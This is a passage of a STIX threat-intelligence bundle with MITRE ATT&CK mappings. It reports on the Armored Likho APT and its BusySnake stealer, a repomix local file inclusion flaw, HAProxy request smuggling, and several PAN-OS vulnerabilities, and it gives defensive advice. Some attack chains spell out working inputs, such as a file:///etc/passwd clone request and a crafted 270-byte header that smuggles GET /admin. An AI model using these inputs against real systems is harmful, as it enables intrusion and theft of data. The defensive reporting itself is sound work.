      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b62c8652-df41-56db-a656-8d55ff735170",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--af8a173c-24c5-549d-93d6-e942357a5af7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Proxy",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1090",
          "url": "https://attack.mitre.org/techniques/T1090"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ee40298f-e5f5-5f79-a0c9-a0ffaaac02de",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b62c8652-df41-56db-a656-8d55ff735170",
      "target_ref": "attack-pattern--af8a173c-24c5-549d-93d6-e942357a5af7"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--482e58fc-3990-51c5-83f1-2095831067d3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Armored Likho"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--640dddbb-4283-5deb-b2e0-8367261dd46e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "attributed-to",
      "source_ref": "report--b62c8652-df41-56db-a656-8d55ff735170",
      "target_ref": "threat-actor--482e58fc-3990-51c5-83f1-2095831067d3"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b62c8652-df41-56db-a656-8d55ff735170",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Armored Likho APT Leverages BusySnake Stealer with AI-Generated Loaders and Phishing",
      "description": "## Overview\n\nThe newly identified Armored Likho APT group is actively targeting government agencies and electric power organizations across Russia, Kazakhstan, and Brazil through an extensive spear-phishing operation. Observed by Kaspersky researchers, this group deploys a sophisticated malware toolkit, including the Python-based BusySnake Stealer, augmented by AI-generated loaders designed to obscure their operational footprint and complicate attribution. The primary objective of these attacks is cyber-espionage, focusing on credential harvesting and maintaining long-term access to critical infrastructure environments. The campaign, which shows no signs of slowing down, began with spear-phishing messages distributing malicious attachments that ultimately lead to the installation of the BusySnake payload, facilitating comprehensive data exfiltration and remote access.\n\n## Attack Chain\n\n1. Armored Likho initiates attacks via spear-phishing messages with lure themes such as official government notices, humanitarian aid applications, or psychological tests.\n2. Emails contain malicious archive attachments, delivered either as Nullsoft Scriptable Install System (NSIS)-built EXE droppers or malicious LNK shortcuts.\n3. If the victim opens an NSIS EXE dropper, it launches a legitimate process and injects a malicious loader code.\n4. Alternatively, if the victim opens a malicious LNK shortcut, it executes an obfuscated PowerShell command.\n5. The PowerShell command or injected loader downloads required Python components and the BusySnake payload from GitHub-hosted archives.\n6. The loader establishes persistence on the compromised device, often creating a scheduled task named `WindowsHelper`.\n7. BusySnake Stealer then actively logs clipboard contents, harvests browser cookies, pulls session tokens from Telegram, captures screenshots, scrapes two-factor authentication secrets, and searches for cryptocurrency wallets, exfiltrating this sensitive data.\n8. Attackers establish reverse SSH tunneling to maintain remote access, manually inspect systems, and pull additional targeted files after initial infection.\n\n## Impact\n\nThe Armored Likho group's activities have a severe impact on targeted government and energy organizations in Russia, Kazakhstan, and Brazil. Successful compromises lead to the exfiltration of credentials, sensitive documents, and other high-value data, enabling long-term espionage and unauthorized access to critical infrastructure. The BusySnake Stealer comprehensively collects clipboard data, browser cookies, Telegram session tokens, screenshots, two-factor authentication secrets, and cryptocurrency wallet information. The establishment of reverse SSH tunnels grants attackers persistent remote access, allowing for ongoing surveillance, data collection, and manual exfiltration, potentially disrupting operations or compromising national security.\n\n## Recommendation\n\n* Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect suspicious LNK execution and scheduled task creation.\n* Implement email security solutions capable of detecting and blocking spear-phishing attempts, particularly those with malicious archive attachments.\n* Monitor `powershell.exe` process creation and network connections for unusual activity, especially outbound connections to file hosting services like GitHub.\n* Enable Sysmon process-creation logging to capture `schtasks.exe` command lines and PowerShell activity for deeper forensic analysis.\n* Regularly educate users on identifying spear-phishing emails and reporting suspicious messages, emphasizing the dangers of opening unexpected attachments.\n",
      "published": "2026-07-08T14:38:38Z",
      "labels": [
        "apt",
        "infostealer",
        "phishing",
        "python",
        "windows",
        "government",
        "energy"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
        "attack-pattern--119922bc-1709-5c39-a91d-5cfccacef48a",
        "attack-pattern--903c407f-69d2-574a-8a5d-526826a282d3",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
        "attack-pattern--af8a173c-24c5-549d-93d6-e942357a5af7",
        "threat-actor--482e58fc-3990-51c5-83f1-2095831067d3"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://hackread.com/armored-likho-government-energy-busysnake-stealer/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--279a082a-d003-53e1-9925-1c3e1c352630",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--aa810be0-fa2b-56e2-b1cf-cc4ae601a9d8",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e9b4c466-18e4-50a6-a23a-e665fb9ccbe6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--aa810be0-fa2b-56e2-b1cf-cc4ae601a9d8",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--aa810be0-fa2b-56e2-b1cf-cc4ae601a9d8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-59703: repomix Local File Inclusion Vulnerability",
      "description": "## Overview\n\nA critical local file inclusion vulnerability, identified as CVE-2026-59703, has been discovered in `repomix`, a tool for managing git repositories. This flaw allows unauthenticated attackers to read arbitrary local git repositories and sensitive server filesystem contents. The vulnerability stems from the `isValidRemoteValue` function in `src/core/git/gitRemoteParse.ts`, which fails to block `file://` URLs. Attackers can supply these specially crafted `file://` scheme URLs via the `git clone` endpoint, bypassing validation and causing the application to pass them directly to the underlying `git clone` command. This enables unauthorized access to tracked files on the server. The vulnerability impacts `repomix` versions prior to 1.14.1. The advisory was published on July 8, 2026, highlighting the immediate need for organizations using vulnerable `repomix` instances to upgrade or implement protective measures to prevent data exfiltration.\n\n## Attack Chain\n\n1. Unauthenticated attacker identifies a public-facing `repomix` instance vulnerable to CVE-2026-59703 (versions \u003c 1.14.1).\n2. The attacker crafts an HTTP POST or GET request targeting the `repomix` `git clone` endpoint, embedding a `file://` URI in the `remote` parameter, e.g., `/git/clone?remote=file:///etc/passwd`.\n3. The `isValidRemoteValue` function in `src/core/git/gitRemoteParse.ts` fails to properly validate and block the `file://` scheme URL.\n4. `repomix` passes the attacker-supplied `file://` URI directly to the underlying `git clone` command.\n5. The `git clone` command attempts to access and clone the local file path specified by the `file://` URI (e.g., `/etc/passwd`).\n6. The `repomix` application returns the content of the targeted local file or directory within the HTTP response to the attacker.\n7. This allows the unauthenticated attacker to read arbitrary local git repositories and other sensitive server filesystem contents, leading to data exfiltration.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-59703 allows unauthenticated attackers to achieve local file inclusion, leading to the unauthorized disclosure of sensitive information. This includes access to arbitrary local git repositories, configuration files (e.g., `/etc/passwd`, database credentials), source code, and other proprietary data stored on the server's filesystem. While no specific victim count or targeted sectors have been disclosed, any organization using vulnerable `repomix` instances is at risk of significant data exfiltration and potential further compromise if credentials or other sensitive information are discovered through this vulnerability.\n\n## Recommendation\n\n* Patch CVE-2026-59703 by upgrading `repomix` to version 1.14.1 or higher immediately.\n* Deploy the provided Sigma rule to your SIEM to detect attempts to exploit CVE-2026-59703 by monitoring webserver logs for `file://` URLs in `git clone` requests.\n* Implement a Web Application Firewall (WAF) rule to block HTTP requests to the `git clone` endpoint containing `file://` URI schemes in request parameters, as described in the attack chain.\n",
      "published": "2026-07-08T15:21:07Z",
      "labels": [
        "local-file-inclusion",
        "web-vulnerability",
        "cve",
        "repomix"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59703"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/CrazyForks/repomix/commit/c748b524f41225e7fc6f89ad0084520901a453cf"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/yamadashy/repomix"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/yamadashy/repomix/issues/1704"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/repomix-local-file-inclusion-via-file-url-scheme-in-git-clone-endpoint"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5a0e54f8-00ab-51e9-a72c-336e03c52f4c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4eafee38-95e3-5622-8310-d6c931c6866b",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e75640e7-3181-5e09-ad40-9b8f41bdaef8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4eafee38-95e3-5622-8310-d6c931c6866b",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4eafee38-95e3-5622-8310-d6c931c6866b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "HAProxy CVE-2021-40346 Integer Overflow Leading to HTTP Request Smuggling and ACL Bypass",
      "description": "## Overview\n\nA public exploit has been released detailing CVE-2021-40346, an integer overflow vulnerability in HAProxy, an open-source reverse proxy and load balancer. This critical flaw resides in the `htx_add_header()` function, which is responsible for storing HTTP headers internally. The vulnerability allows attackers to perform HTTP Request Smuggling and bypass Access Control List (ACL) rules by manipulating the length of HTTP header names. Specifically, by crafting a header name exactly 270 bytes long, an integer overflow occurs, leading HAProxy to misinterpret a forged `Content-Length: 0` header. This enables the smuggling of a second, hidden request that bypasses HAProxy's initial ACL checks and is delivered to the backend server. The presence of a public Proof-of-Concept (PoC) significantly elevates the risk for unpatched HAProxy installations, particularly versions 2.0 through 2.5 (dev6).\n\n## Attack Chain\n\n1. The attacker crafts an HTTP POST request targeting the HAProxy instance.\n2. Within this request, a specially designed header name, such as `Content-Length0` followed by 255 'a' characters (totaling 270 bytes), is included.\n3. HAProxy's `htx_add_header()` function attempts to store this header name, which exceeds the capacity of its 8-bit length field.\n4. An integer overflow occurs, causing HAProxy to misinterpret the manipulated header as a valid `Content-Length: 0`.\n5. Following this forged header, the attacker appends a legitimate `Content-Length` header corresponding to the size of a hidden, malicious HTTP request (e.g., `GET /admin HTTP/1.1`).\n6. HAProxy proceeds to read the entire client-provided body, including the hidden request, but its internal logic has been poisoned by the `Content-Length: 0` interpretation.\n7. When forwarding to the backend, HAProxy's ACLs, configured to inspect only the initial request line, do not detect the smuggled request.\n8. The backend server, having received a `Content-Length: 0` for the initial request, then processes the subsequent hidden data (e.g., `GET /admin`) as a completely new, unauthorized request, effectively bypassing HAProxy's `http-request` ACLs and gaining access to restricted paths.\n\n## Impact\n\nThe successful exploitation of CVE-2021-40346 leads to significant security breaches, primarily unauthorized access to restricted backend services and administrative interfaces (e.g., `/admin`). Organizations leveraging HAProxy as a reverse proxy or load balancer with `http-request` based ACLs are at risk. This vulnerability could allow attackers to bypass critical security controls designed to segregate network traffic or protect sensitive application endpoints. Depending on the backend application's functionality, this bypass could lead to further compromise, such as privilege escalation, data exfiltration, or complete system takeover. The availability of a public exploit increases the likelihood of widespread attacks against vulnerable systems.\n\n## Recommendation\n\n* Immediately upgrade HAProxy installations to patched versions: 2.0.25, 2.2.17, 2.3.14, 2.4.4, or newer, to remediate CVE-2021-40346.\n* Implement defense-in-depth measures by ensuring backend applications have their own robust authentication and authorization logic, rather than solely relying on proxy ACLs.\n",
      "published": "2026-07-08T16:05:12Z",
      "labels": [
        "integer-overflow",
        "http-smuggling",
        "acl-bypass",
        "haproxy",
        "webserver"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://sploitus.com/exploit?id=C6651C75-45C4-5A75-9E0F-77CB87257507"
        },
        {
          "source_name": "reference",
          "url": "https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c9202a1c-87ea-577a-a253-26ebbf1043dc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-0282 PAN-OS: Unauthenticated File Deletion Vulnerability",
      "description": "## Overview\n\nPalo Alto Networks has disclosed CVE-2026-0282, a low-severity file deletion vulnerability impacting its PAN-OS software, which runs on PA-Series and VM-Series firewalls, as well as Panorama management appliances (virtual and M-Series). An unauthenticated attacker with network access to the management web interface can exploit this flaw to delete files from a temporary directory. The vulnerability was discovered internally and has no reported instances of in-the-wild exploitation. While the CVSS score is low (2.7-5.1 depending on configuration), organizations are urged to patch to prevent potential misuse, especially if management interfaces are exposed to untrusted networks. Cloud NGFW and Prisma Access products are not affected by this issue, simplifying the scope of necessary updates.\n\n## Attack Chain\n\n1. An unauthenticated attacker establishes network connectivity to the management web interface of a vulnerable PAN-OS device.\n2. The attacker sends a specially crafted request to the web interface.\n3. The PAN-OS software processes the request, which due to improper input validation, results in arbitrary file deletion.\n4. The system deletes a file from a temporary directory on the vulnerable device.\n5. No immediate integrity or availability impact on the product itself is observed beyond temporary file deletion.\n6. The objective is the deletion of temporary files, which could potentially disrupt operations or be a precursor to other attacks.\n\n## Impact\n\nThe primary impact of CVE-2026-0282 is the ability for an unauthenticated attacker to delete files within a temporary directory on affected PAN-OS devices. While the direct consequence of deleting temporary files is often minimal, such actions could potentially disrupt operations or serve as a precursor to more sophisticated attacks if combined with other vulnerabilities. Palo Alto Networks stresses that the security risk is substantially mitigated by adhering to best practice deployment guidelines, which involve restricting management interface access to only trusted internal IP addresses. There are no known instances of malicious exploitation in the wild.\n\n## Recommendation\n\n* Upgrade affected PAN-OS instances to fixed versions (12.1.8, 11.2.13, 11.1.16, or later, as per CVE-2026-0282 advisory) to remediate the vulnerability.\n* Implement network access controls to restrict access to the management web interface of PA-Series, VM-Series, and Panorama devices from untrusted networks, as recommended in the CVE-2026-0282 advisory.\n",
      "published": "2026-07-08T16:06:06Z",
      "labels": [
        "vulnerability",
        "pan-os",
        "network-device",
        "file-deletion"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://security.paloaltonetworks.com/CVE-2026-0282"
        }
      ],
      "confidence": 40
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cf91999a-8f2a-5aea-9d5b-36c61625c358",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd627928-d5fc-5b91-9982-6b23ad383723",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--dd627928-d5fc-5b91-9982-6b23ad383723",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-0287 PAN-OS: Denial of Service Vulnerabilities in Network Traffic Processing",
      "description": "## Overview\n\nPalo Alto Networks has disclosed multiple denial of service vulnerabilities, tracked as CVE-2026-0287, affecting various versions of its PAN-OS® software, Cloud NGFW, and Prisma Access products. An unauthenticated attacker with network access can trigger a denial of service (DoS) condition by sending specially crafted network traffic to or through a vulnerable dataplane interface. Repeated exploitation of this vulnerability can force the firewall into maintenance mode, disrupting network traffic and service availability. While Cloud NGFW and Prisma Access have built-in resilience, they are still susceptible. This vulnerability, discovered internally, carries a CVSSv4 score of 8.7 (High) and requires immediate patching for affected on-premises PAN-OS installations. Palo Alto Networks is not aware of any in-the-wild exploitation at this time.\n\n## Attack Chain\n\n1. An unauthenticated attacker gains network access to a vulnerable Palo Alto Networks PAN-OS dataplane interface.\n2. The attacker crafts and sends specially crafted network traffic designed to exploit CVE-2026-0287.\n3. The vulnerable PAN-OS device processes this malicious traffic through its network traffic processing component.\n4. The specially crafted traffic triggers a denial of service condition within the firewall's operating system.\n5. The DoS condition disrupts the firewall's ability to process legitimate network traffic.\n6. Repeated attempts by the attacker to exploit the vulnerability cause the firewall to enter maintenance mode, completely interrupting network availability.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-0287 leads to a denial of service condition, severely degrading or completely interrupting network traffic processing through the affected Palo Alto Networks firewall. If exploited repeatedly, the firewall enters maintenance mode, rendering it inoperable and causing a full network outage. While Cloud NGFW and Prisma Access products have some built-in resilience, they are not immune, potentially leading to service disruptions for cloud-based network security. This vulnerability impacts organizations relying on these firewalls for network segmentation, security policies, and internet connectivity, resulting in significant operational downtime and potential loss of business continuity.\n\n## Recommendation\n\n* Prioritize patching all affected Palo Alto Networks PAN-OS installations to the versions specified in the security advisory to remediate CVE-2026-0287.\n* For Cloud NGFW and Prisma Access customers, contact Palo Alto Networks Support to schedule an on-demand software upgrade if a more immediate patch is required prior to the next scheduled maintenance cycle as per the CVE-2026-0287 advisory.\n",
      "published": "2026-07-08T16:07:00Z",
      "labels": [
        "denial-of-service",
        "vulnerability",
        "network",
        "firewall",
        "palo-alto-networks"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://security.paloaltonetworks.com/CVE-2026-0287"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--06c109c8-8e07-5b04-b7b8-bf0681292f05",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Man-in-the-Middle",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1557",
          "url": "https://attack.mitre.org/techniques/T1557"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a89353c0-51c6-513a-b9de-73bed96049a4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d57587e5-4e5a-531d-af4a-5e48d5f62096",
      "target_ref": "attack-pattern--06c109c8-8e07-5b04-b7b8-bf0681292f05"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d57587e5-4e5a-531d-af4a-5e48d5f62096",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-0277 Prisma Access Agent: Improper Certificate Validation on iOS",
      "description": "## Overview\n\nPalo Alto Networks has disclosed CVE-2026-0277, an improper certificate validation vulnerability affecting the Prisma Access Agent for iOS. This vulnerability impacts all iOS versions of the agent prior to 26.2.1. An attacker could exploit this flaw to execute a man-in-the-middle (MitM) attack, allowing them to intercept and potentially modify VPN traffic passing through the vulnerable client. No special configuration is required for exposure to this issue. While Palo Alto Networks is not aware of any malicious exploitation in the wild, the vulnerability's nature poses a significant risk to the confidentiality and integrity of user communications for organizations relying on Prisma Access for iOS devices. Immediate patching is recommended to mitigate this risk.\n\n## Attack Chain\n\n1. An attacker gains a privileged network position, such as on a public Wi-Fi network, allowing them to intercept network traffic between a victim's iOS device and the legitimate Prisma Access VPN gateway.\n2. The attacker sets up a rogue server (e.g., a malicious access point or a compromised DNS server) to masquerade as the legitimate Prisma Access VPN endpoint.\n3. The attacker presents a malicious or invalid TLS certificate to the vulnerable Prisma Access Agent on the iOS device during the VPN connection establishment process.\n4. Due to the improper certificate validation flaw (CVE-2026-0277), the Prisma Access Agent for iOS fails to correctly verify the authenticity of the attacker's certificate.\n5. The vulnerable iOS client establishes a \"trusted\" VPN connection with the attacker's rogue server, believing it to be the legitimate Prisma Access gateway.\n6. All subsequent VPN traffic from the victim's iOS device is routed through the attacker-controlled server.\n7. The attacker can then decrypt, inspect, modify, and re-encrypt the intercepted VPN traffic before forwarding it to the legitimate Prisma Access gateway, and vice-versa.\n8. The final objective is the compromise of sensitive data confidentiality and integrity from the victim's device, or the injection of malicious content.\n\n## Impact\n\nA successful exploitation of CVE-2026-0277 would allow an attacker to intercept all VPN traffic from affected iOS devices utilizing the Prisma Access Agent. This could lead to a severe compromise of sensitive data confidentiality, allowing an attacker to steal credentials, personal information, or proprietary corporate data. Furthermore, the integrity of communications could be undermined, as an attacker could potentially inject malicious content into the data stream, leading to further compromise of the victim's device or network. While no exploitation has been reported, the potential for high confidentiality and integrity impact underscores the severity for organizations with iOS devices connected to Prisma Access.\n\n## Recommendation\n\n* Upgrade the affected Prisma Access Agent on iOS to version 26.2.1 or later immediately to remediate CVE-2026-0277.\n* Communicate the urgent need to update their Prisma Access Agent to all users with iOS devices.\n",
      "published": "2026-07-08T16:07:54Z",
      "labels": [
        "vulnerability",
        "mitm",
        "ios",
        "vpn",
        "palo-alto-networks"
      ],
      "object_refs": [
        "attack-pattern--06c109c8-8e07-5b04-b7b8-bf0681292f05"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://security.paloaltonetworks.com/CVE-2026-0277"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3655bcd1-1d45-586d-b0a6-dea2d8c73d51",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--27af6ea1-0d75-5cd1-bbf5-504e60bc94e9",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Steal Web Session Cookie",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1539",
          "url": "https://attack.mitre.org/techniques/T1539"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--81a6870d-5b24-503a-822f-8e6e892b75d2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--27af6ea1-0d75-5cd1-bbf5-504e60bc94e9",
      "target_ref": "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--27af6ea1-0d75-5cd1-bbf5-504e60bc94e9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-0281 PAN-OS: Information Disclosure Vulnerability in Management Web Interface",
      "description": "## Overview\n\nPalo Alto Networks has disclosed CVE-2026-0281, an information disclosure vulnerability affecting the management web interface of PAN-OS software across PA-Series, VM-Series firewalls, and Panorama devices. This vulnerability allows an unauthenticated attacker with network access to the management interface to obtain web session tokens. Exploitation requires a legitimate user to first click on a malicious link provided by the attacker, making it a client-side vulnerability with user interaction. While the vulnerability has been internally discovered, Palo Alto Networks is not aware of any malicious exploitation in the wild. This issue impacts PAN-OS versions 12.1.2 through 12.1.7-h*, 11.2.0 through 11.2.12, 11.1.0 through 11.1.15-h*, and all 10.2.x versions. The risk is minimized by following best practices of restricting management interface access to trusted internal IP addresses.\n\n## Attack Chain\n\n1. **Attacker crafts malicious link**: An unauthenticated attacker creates a specially crafted malicious URL designed to exploit CVE-2026-0281 on the target PAN-OS management interface.\n2. **Attacker delivers malicious link**: The attacker sends the malicious link to a legitimate user who has administrative access to the vulnerable PAN-OS management interface, likely via a social engineering campaign such as a spearphishing email or instant message.\n3. **Legitimate user clicks link**: The targeted legitimate user, believing the link to be benign, clicks on the malicious URL while their browser is authenticated to the PAN-OS management interface.\n4. **Browser requests PAN-OS interface**: The user's browser makes a request to the PAN-OS management web interface, triggering the information disclosure vulnerability as a result of the malicious link's parameters or redirection.\n5. **PAN-OS discloses session token**: The vulnerable PAN-OS management web interface processes the request and, due to CVE-2026-0281, inadvertently discloses the user's active web session token to the attacker's controlled infrastructure.\n6. **Attacker captures session token**: The attacker's controlled server or client-side script captures the exfiltrated web session token.\n7. **Attacker authenticates to PAN-OS**: The attacker uses the stolen web session token to establish an unauthorized, authenticated session with the PAN-OS management interface, bypassing the need for credentials.\n8. **Unauthorized management access**: With the compromised session, the attacker gains the ability to perform administrative actions on the firewall, such as modifying configurations, exfiltrating data, or establishing persistence within the network.\n\n## Impact\n\nThe primary impact of successful exploitation of CVE-2026-0281 is the unauthorized disclosure of web session tokens, which could lead to complete compromise of the Palo Alto Networks firewall management interface. Although Palo Alto Networks is not aware of any in-the-wild exploitation, organizations that fail to patch or implement proper network segmentation for their management interfaces could face severe consequences. An attacker gaining unauthorized access could reconfigure firewall rules, disable security features, establish backdoor access, or use the firewall as a pivot point for further attacks into internal networks, leading to data breaches or service disruptions. The extent of impact depends heavily on the access controls protecting the management interface.\n\n## Recommendation\n\n* **Patch CVE-2026-0281**: Immediately upgrade affected PAN-OS software versions to the remediated versions as per Palo Alto Networks' advisory for CVE-2026-0281.\n* **Restrict management interface access**: Secure access to your Palo Alto Networks firewall management interfaces by restricting access to only trusted internal IP addresses, as recommended by Palo Alto Networks' best practice deployment guidelines.\n* **Review network segmentation**: Ensure robust network segmentation for management networks to prevent unauthenticated external access to firewall management interfaces.\n* **Educate users on phishing**: Reinforce user education regarding spearphishing attempts and malicious links, as user interaction is required for this vulnerability's exploitation.\n",
      "published": "2026-07-08T16:08:54Z",
      "labels": [
        "information-disclosure",
        "network-device",
        "firewall",
        "palo-alto-networks",
        "cve"
      ],
      "object_refs": [
